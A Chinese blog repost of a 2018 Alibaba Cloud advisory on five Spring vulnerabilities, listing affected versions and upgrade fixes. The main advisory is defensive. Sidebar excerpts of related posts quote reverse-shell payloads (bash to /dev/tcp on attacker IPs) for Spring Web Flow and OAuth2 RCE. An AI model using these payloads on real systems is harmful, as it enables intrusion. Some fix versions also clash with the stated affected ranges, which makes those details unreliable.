【漏洞公告】Spring 框架及组件多个安全漏洞

最新推荐文章于 2024-06-12 22:07:25 发布
最新推荐文章于 2024-06-12 22:07:25 发布
阅读量3.4k 收藏
点赞数 1
分类专栏: spring-boot

【漏洞公告】Spring 框架及组件多个安全漏洞

2018年5月8日,阿里云云盾应急响应中心监测到Spring官方发布3个严重,2个高危漏洞,漏洞涉及Spring Messaging组件,Spring Security框架,Spring Data 框架等多个模块,攻击者可利用该漏洞实施远程代码执行攻击,DoS,绕过安全限制获取敏感信息。

漏洞详情见下文

漏洞编号

CVE-2018-1257

CVE-2018-1258

CVE-2018-1259

CVE-2018-1260

CVE-2018-1261

漏洞名称

CVE-2018-1257:Spring Messaging组件中存在漏洞可导致正则表达式拒绝服务攻击

CVE-2018-1258:Spring Security框架Method Security安全限制绕过漏洞

CVE-2018-1259:Spring Data 框架使用XMLBean产生XXE漏洞

CVE-2018-1260:Spring-Security-OAuth2 远程代码执行漏洞

CVE-2018-1261:Spring-Integration-Zip 任意文件写漏洞

官方评级

CVE-2018-1257 (高危)

CVE-2018-1258 (严重)

CVE-2018-1259 (高危)

CVE-2018-1260 (严重)

CVE-2018-1261 (严重)

漏洞描述

CVE-2018-1257 Spring Messaging组件中存在漏洞可导致正则表达式拒绝服务攻击

Spring框架5.0.x系列5.0.6之前的版本,4.3.x系列4.3.17之前的版本,和其他不再受支持的版本中存在漏洞,攻击者可以利用该漏洞向内存中的STOMP消息服务发送特殊的消息,导致在处理正则表达式时候出现拒绝服务。

严重等级:高

受漏洞影响的条件:

1.依赖了spring-messaging和spring-websocket模块。

2.在WebSocket端点上注册了STOMP协议。

3.开启了简单STOMP消息服务。

修复措施:升级Spring框架到5.0.6/4.3.17

CVE-2018-1258 Spring Security框架Method Security安全限制绕过漏洞

Spring Security Method Security 和 Spring框架5.0.5.RELEASE 结合使用时会出现身份授权绕过漏洞,未经授权的恶意用户可访问禁止访问的方法。

严重等级:严重

影响范围:

Spring Framework 5.0.5.RELEASE + 任意版本的 Spring Security

修复方案:

升级Spring框架到5.0.6及以上。

升级Spring Boot到2.0.2及以上。

CVE-2018-1259: Spring Data 框架使用XMLBean产生XXE漏洞

Spring Data Commons 框架1.13.x系列1.13.11之前的版本,2.0.x系列 2.0.6之前的版本,和XMLBean1.4.14之前的版本一起使用时包含一个属性绑定漏洞,该漏洞由于XMLBean库未限制外部引用扩展造成的。未经身份认证的远程恶意用户可以向Spring Data基于投射的请求Payload绑定提交特制的请求参数访问系统上的任意文件。

严重等级:高

影响范围:

Spring Data Commons

Spring Data Commons 1.13 to 1.13.11 (Ingalls SR11)

Spring Data REST 2.6 to 2.6.11 (Ingalls SR11)

Spring Data Commons 2.0 to 2.0.6 (Kay SR6)

Spring Data REST 3.0 to 3.0.6 (Kay SR6)

修复方案:

1.13.x 升级到 1.13.12 (Ingalls SR12)

2.0.x 升级到 2.0.7 (Kay SR7)

或升级 XMLBeam 到 1.4.15

以下框架已经修复了该问题:

Spring Data REST 2.6.12 (Ingalls SR12)

Spring Data REST 3.0.7 (Kay SR7)

CVE-2018-1260 Spring-Security-OAuth2 远程代码执行漏洞

Spring Security OAuth模块2.3.x系列2.3.3之前的版本,2.2.x系列2.2.2之前的版本,2.1.x系列2.1.2之前的版本,2.0系列2.0.15之前的版本和停止支持的版本中包含一个远程代码执行漏洞。恶意的用户可以通过特制授权请求在服务器上执行任意代码。

  1. 受漏洞影响的条件:
  2. 1. 角色是授权服务器(@EnableAuthorizationServer)。
  3. 2. 使用默认的Approval Endpoint。
  4. 该漏洞不影响如下配置:
  5. 1. 角色是授权服务器,但是不使用默认的Approval Endpoint。
  6. 2. 只扮演资源服务器的。(@EnableResourceServer)。
  7. 3. 只扮演OAuth客户端的。(@EnableAuthClient)。

修复方案:

Spring Security OAuth 2.3 升级到 2.3.2

Spring Security OAuth 2.2 升级到 2.2.1

Spring Security OAuth 2.1 升级到 2.1.1

Spring Security OAuth 2.0 升级到 2.0.14

CVE-2018-1261: Spring-Integration-Zip 任意文件写漏洞

spring-integration-zip 1.0.1之前的版本的unzip transformer中存在一个任意文件写漏洞,恶意构造的压缩文档解压时会覆盖外部文件。

严重等级:严重

影响范围:Spring Integration Zip Community Extension Project 版本 1.0.0

修复方案:升级到1.0.1

漏洞利用条件和方式

CVE-2018-1257:DoS攻击

CVE-2018-1258:身份授权绕过,未授权访问

CVE-2018-1259:XXE漏洞

CVE-2018-1260:远程代码执行

CVE-2018-1261:任意文件写漏洞

漏洞检测

检查是否使用了受影响版本

漏洞修复建议(或缓解措施)

阿里云安全团队建议使用了Spring相关框架用户关注并及时更新到官方最新版

Spring Security OAuth:https://projects.spring.io/spring-security-oauth/

Spring Data REST:https://projects.spring.io/spring-data-rest/

Spring Framework: https://projects.spring.io/spring-framework/

Spring Integration Zip:https://github.com/spring-projects/spring-integration-extensions/tree/master/spring-integration-zip

Spring Data Commons:https://github.com/spring-projects/spring-data-commons/releases

情报来源

https://pivotal.io/security

转载自阿里云:
https://help.aliyun.com/knowledge_detail/72028.html

BraveSoul360
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Day617.SpringData常见错误 -Spring编程常见错误
阿昌爱Java
05-14 541
SpringData常见错误 Spring已经为我们继承好了去操作对应数据源的方式:SpringData,如下名: Spring Data Commons Spring Data JPA Spring Data KeyValue Spring Data LDAP Spring Data MongoDB Spring Data Redis Spring Data REST Spring Data for Apache Cassandra Spring Data for Apache Geode Spring
【网络安全Spring框架漏洞总结(一)
kali_Ma的博客
09-10 2581
Spring简介 Spring是Java EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架。 2009年9月Spring 3.0 RC1发布后,Spring就引入了SpEL (Spring Expr
Spring Core RCE 漏洞复现
最新发布
qq_73630656的博客
06-12 555
远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件
spring漏洞合集 下
寒星的博客
05-07 5439
前言 现在的 java 开放的网站十个里面有九个是 spring 写的。网上对 spring 相关漏洞的资料很多,但是总结的文章却很少,再加上 spring 庞大的生态,每当看到 spring 相关网站的时候,脑子里虽然零零散散冒出来一堆漏洞,但是却不知道哪些符合当前环境。 因此搜集了所有 spring 相关漏洞,对它们的利用条件和检测方式进行梳理和总结,希望在面对 spring 的时候,能够有一个更完整的思路去发现漏洞。 这里更多是的是的利用条件和检测方式的总结,主要以发现漏洞为目的,至于如何将漏洞效果最
spring漏洞合集及其poc合集
weixin_46626737的博客
08-21 491
在post请求体中加上_eventId_confirm=&_csrf=4962b53e-b8c7-4290-8fa4-10dd87fd6ead&_(new java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.10.7/2233 +0>%261")).start()=vulhub。1)漏洞原理:Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。
Spring Security OAuth2 远程命令执行漏洞
wutiangui的博客
09-09 470
准备shell代码:bash -i >& /dev/tcp/192.168.155.2/1111 0>&1。python3 poc.py #输入要执行的命令,会返回处理后的命令,这里输入whoami。出现以下报错,表示漏洞存在(response_type里面的命令执行了)将上面的命令加入到response_type参数部分,得到变形后的url。返回了进程,表示代码执行了,但这没有回显,是无回显RCE。执行变形后的payload得到shell。用admin:admin登陆。六、Getshell。
spring-web-5.2.4_spring-web_SSM框架_
09-29
这个版本可能包括对旧版浏览器的兼容性改进,安全漏洞的修复,以及对其他相关库的升级。 SSM框架中的Spring Web扮演着至关重要的角色,它作为整个SSM架构的入口,负责处理来自用户的请求,并通过Spring的依赖注入和...
Spring Boot 快速搭建微服务框架详细教程
08-29
随着项目的发展,可以继续添加更多的服务和组件,如Eureka实现服务注册与发现,Zuul或Spring Cloud Gateway作为API网关,RabbitMQ或Kafka作为消息中间件,以及Docker和Kubernetes进行容器化和集群管理。总之,Spring...
spring-boot-2.2.0.RELEASE.zip
04-21
4. **安全更新**:Spring Security得到了增强,支持更多的认证和授权策略,同时对潜在的安全漏洞进行了修复。 5. **健康检查**:Actuator模块的健康检查功能进一步强化,提供了更多定制化选项,使得监控和管理应用...
Spring-Security-3应用的11个步骤.docx
09-04
例如,Session一致性验证确保了用户的会话在多个并发请求中的一致性。Remember-Me服务则提供了自动登录功能,使得用户在一段时间内无须重新登录。 2. **方法安全** - 使用AOP(面向切面编程)模式实现安全代理,可以...
基于SpringBoot编写的常见Web漏洞安全开发学习平台.zip
05-18
【描述】: "这个项目是一个基于SpringBoot框架的Java应用,旨在为学生和开发者提供一个学习和实践Web安全漏洞开发的平台。它涵盖了从基础到进阶的各种Web安全问题,包括但不限于SQL注入、XSS跨站脚本攻击、CSRF跨站...
Spring框架漏洞
weixin_68408599的博客
12-11 1373
以下框架漏洞均为Spring框架,讲解方式为漏洞产生原因以及漏洞复现,重点是漏洞复现的具体过程。
spring框架远程代码执行漏洞
深秋哋黎明的专栏
11-20 9843
Spring框架远程代码执行 0x01 概述 2012年12月国外研究者DanAmodio发表《Remote Code with Expression Language Injection》一文,指出Spring框架存在潜在的代码注入风险。在2013年1月,国内安全研究人员在微博上分享了该篇文章的中文翻译内容。 文章中指出Spring框架3.0.6以下版本,在一定的条件下,可以被
Spring框架反射型文件下载漏洞 CVE-2020-5421
dushan1234的专栏
09-25 8776
这篇文章是昨晚写的XStream漏洞的姊妹篇,本次腾讯云提醒的漏洞,出了fastjson的漏洞,还有这个CVE-2020-5421漏洞,也是一样的解决方案。 解决方案: 1.打开腾讯云的漏洞管理,看有哪些漏洞,再接着点击漏洞的名称,腾讯云会告诉你漏洞具体到那个jar包和相应的解决方案。 如下图,全是spring-core的jar包版本问题,我的项目是springcloud框架,所以spring的jar包也是框架自动引入的。系统是一个 老系统,弄到现在springboot的版本是1.5.12,而sprin.
Spring Data Commons项目介绍
实践求真知
09-08 8583
一 点睛 Spring Data Commons有一个重要概念:Spring Data Repository抽象。使用Spring Data Repository可以极大地减少数据访问层的代码。既然是数据访问操作的统一标准,那肯定是定义了各种各样和数据访问相关的接口,下面来看看Spring Data Repository抽象的根接口是怎样定义的。 二 关键源码解读 1 Repository接...
Spring Data Commons
weixin_45594127的博客
11-27 2364
Spring data repository
spring框架漏洞整理
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 1370
近日, Spring官方发布多个安全公告其中包括3个严重,2个高危漏洞漏洞涉及Spring Messaging组件Spring Security框架spring框架漏洞整理,攻击者可通过这些漏洞实施远程代码执行攻击、拒绝服务攻击及获取敏感信息等。 Spring Messaging组件中存在漏洞可导致正则表达式拒绝服务攻击(CVE-2018-1257)Spring是一个开放源代码的设计层面框架,他解决的是业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用。
Spring Boot】Spring Boot @EnableOAuth2Client 示例 | 通过 Github 登录自己的项目
猫巳的博客
10-19 2144
文章目录演示工具版本Maven 依赖OAuth2ClientContext使用 @EnableOAuth2Client 的 OAuth2 客户端 Security 配置创建控制器和视图输出参考文献源码下载 本页将介绍Spring Boot @EnableOAuth2Client注释的例子。 @EnableOAuth2Client允许在Spring Security Web应用程序中配置OAuth2客户端。 @EnableOAuth2Client允许使用来自一个或多个OAuth2授权服务器的授权代码授权。 为
Spring Security有哪些常见的安全漏洞及如何预防?
08-18
### 回答1: Spring Security有很多种常见的安全漏洞,包括SQL注入、跨站脚本攻击以及跨站请求伪造等。 为了预防这些漏洞,需要对应用程序进行安全审计,并定期测试和更新其代码。同时,可以使用Spring Security中提供的安全策略和配置,以限制可能的攻击行为。 ### 回答2: Spring Security是一个功能强大的安全框架,它提供了对应用程序的身份验证和授权的支持。然而,即使使用了Spring Security,仍然会存在一些常见的安全漏洞。以下是一些常见的安全漏洞及相应的预防方法: 1. 跨站脚本攻击(XSS):攻击者通过注入恶意脚本来攻击用户,在用户浏览器上执行恶意代码。预防方法:使用Spring Security的默认安全策略进行输出编码,以防止恶意脚本的注入。 2. 跨站请求伪造(CSRF)攻击:攻击者通过伪装合法网站的请求,欺骗用户执行恶意操作。预防方法:使用Spring Security的CSRF保护功能,生成和验证每个请求的令牌。 3. 会话管理漏洞:未正确管理会话可能导致会话劫持或会话固定攻击。预防方法:使用Spring Security提供的会话管理功能,例如设置适当的会话超时时间、使用HTTPS、禁止URL重写等。 4. 请求参数篡改:攻击者可以修改请求参数,绕过应用程序的安全检查。预防方法:使用Spring Security验证和过滤用户输入,确保参数的完整性和有效性。 5. 不安全的密码存储:密码是最重要的敏感信息之一,如果以明文形式存储或使用不安全的哈希算法进行存储,将容易受到攻击。预防方法:使用Spring Security提供的密码加密功能,使用哈希算法和盐值来存储密码。 6. 权限绕过:未正确配置和使用Spring Security的授权机制可能导致攻击者绕过应用程序的权限检查。预防方法:确保正确配置和使用Spring Security的授权机制,限制用户只能访问其授权的资源和操作。 7. 信息泄露:错误和异常信息可能泄露应用程序的敏感信息,如数据库连接和配置信息。预防方法:使用Spring Security提供的错误处理机制,限制错误信息的显示,并记录和监控错误日志。 总之,使用Spring Security可以提高应用程序的安全性,但仍需注意常见的安全漏洞,并采取相应的预防措施来保护应用程序免受攻击。 ### 回答3: Spring Security是一个开源的企业级安全框架,用于保护Java应用程序免受各种安全漏洞的攻击。以下是Spring Security中常见的安全漏洞及预防措施: 1. 跨站脚本攻击(XSS):攻击者通过在页面中注入恶意脚本来获取用户的敏感信息。预防措施包括对用户输入进行严格的过滤和转义,确保在输出到页面之前进行正确的编码。 2. 跨站请求伪造(CSRF):攻击者通过引诱用户在已登录的状态下访问恶意网站来执行非法操作。预防措施包括使用CSRF令牌对于每个请求进行验证,并将令牌嵌入到表单中。 3. 会话固定攻击:攻击者获取用户的会话ID,并使用该ID冒充用户进行操作。预防措施包括在用户认证成功后生成一个新的会话ID,并关闭之前的会话。 4. 基于角色的访问控制(RBAC)漏洞:未正确配置角色权限导致未授权的用户可以访问敏感资源。预防措施包括仔细分配和管理角色权限,确保只有经过授权的用户才能访问受限资源。 5. 密码安全问题:使用弱密码、明文存储或传输密码等都可能导致密码泄露。预防措施包括要求用户使用强密码、使用哈希函数对密码进行加密存储,并使用加密协议进行密码传输。 6. 集成第三方组件漏洞:如果集成的组件存在已知的安全漏洞,攻击者可以通过利用这些漏洞来攻击应用程序。预防措施包括及时更新和维护所有集成的组件,确保它们都是最新版本,并且没有已知的安全漏洞。 总之,Spring Security提供了多种功能和机制来保护应用程序免受各种安全漏洞的攻击。开发人员应该仔细了解这些漏洞,并采取相应的预防措施来确保应用程序的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值